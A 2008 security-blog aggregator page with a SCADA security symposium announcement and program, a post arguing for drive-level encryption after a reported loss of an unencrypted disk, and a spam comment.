Bottom line, vendors must provide more information allowing administrators to make better decisions as well as permitting independent security vendors to provide external mitigation solutions within a short time frame. Only in this way can enterprises achieve deliver effective security for their databases.

- Amichai

S4 Registration Open! [Digital Bond]

Posted: 15 Oct 2008 08:22 AM CDT

General registration is now open for the 2009 edition of the SCADA Security Scientific Symposium [S4]. There are only 55 spots for physical attendees, so if you want to be part of a unique, highly technical event with other control system researchers and thought leaders [in beautiful Miami Beach in January] register early to get a spot.

Here are the key links:

We are really pleased with the technical rigor and importance of the accepted papers. We have papers from the US, Japan and France. Papers from well known researchers and new faces. Papers focused on vulnerabilities, security protocols, metrics and more. It is encouraging to see the progress the control system research community has made over the past 3 years.

I highly encourage you to check out the program that has more information on each session and the reason we selected it, as well as pictures of the venue and conference hotel.

We are again offering a physical attendee option for $995 and a virtual attendee option for $800.

Tuesday January 20, Bonus Training Course

  • Advanced Security Testing of Control System Components
  • The course that past attendees requested. Highly technical, limited to 24 students with 4 instructors. Training is available on site only for $600 supplement.

    Wednesday January 21, S4 Day 1

    • Keynote - Stay tuned for more info - past keynotes include Whit Diffie, Steve Lipner and Dave Aitel
    • Leveraging Ethernet Card Vulnerabilities in Field Devices
    • Estimation and Observations of 0Day Vulnerabilities in Control Systems
    • Customizing Control System Intrusion Detection at the Application Layer
    • An Analysis of Two New Directions in Control System Perimeter Security
    • Secure Wireless Key Management for MAC-Layer Security and First Responder Credentialing
    • Invited Paper - - stay tuned

    Thursday January 22, S4 Day 2

    • Jamming and Interference Induced Denial of Service Attacks on IEEE 802.15.4 Based Wireless Networks
    • Low-Level Design Vulnerabilities in Wireless Control Systems Hardware
    • The Great Debate – Is It Possible to Safely and Securely Connect Safety Systems to Control Systems?
    • Security Metrics for Cyber Security Assurance
    • Denial of Control: Availability and Integrity Attacks Against Critical Systems
    • Aggregating and Correlating Security Events in Historians to Detect Cyber Attacks and Classify Attack Consequences

    As in past years I will be previewing the papers beginning next week.

    Encrypted within or without Restricted Areas [CultSEC Blog]

    Posted: 15 Oct 2008 03:46 AM CDT

    A friend forwarded an interesting article to me yesterday. It was posted on the BBC News web site reporting "Up to 1.7m people's data missing." Of particular note in this article:

    EDS assesses that it is unlikely that the device was encrypted because it was stored within a secure site that exceeded the standards necessary for restricted information.

    Where do I start with this one?

    First, let's take a simple view of this. The disk drive was stored within a secure site which exceeded standards. This belief only works if you have complete and detailed access control to the secure site. Assuming devices will never fail, maybe you can argue the risk level is low and the probability of a loss is a long shot. The only problem is, I haven't seen any site exercise complete and total control. Hardware does fail. If it is a disk drive, chances are the IT folks will replace the malfunctioning drive. The "bad" drive should be inventoried and disposition tracked.

    Now let's pick on the need to encrypt inside a secure site. In a perfect security world, every disk drive would be encrypted. Even if it stored inside a secure facility. We're not in a perfect world so we have to rely on process, procedures, and controls to help mitigate risk. Until hard drives are encrypted on the fly, we'll continue to have this problem. Seagate has white papers and studies which discuss some issues around securing data centers and servers.

    One quote from their site pertains to the subject:

    Unauthorized data exposure can occur even in the best-managed data center. The wise precaution is to secure sensitive data with drive-level encryption, so that the data is rendered useless when the drive is unplugged and leaves the data center. Retired and repurposed drives can also be securely and completely erased before they are redeployed.

    I pulled this up rather quickly so please don't take this as a promotion of Seagate. Though it is nice to see manufacturer's finally creating drives will full disk encryption on the drive. They also have an interesting site focused solely on encrypting drives in data centers.

    The bottom line is this. Hard drives are mobile. They will fail on occasion. Failed drives can be recovered with the right technology. Processes are key. If the a drive failed, then degauss it or shred it. If the drive is being repurposed, then erase the drive.

    1 comment:

    oliviaharis said...

    Bloggers and Blogger Networks play a crucial if not critical role in spreading awareness among the developers, organizations and masses. Also, blogs generally play an important role in terms of promoting ideas and allowing various professionals to work together on ideas and/or projects.
    social bookmarking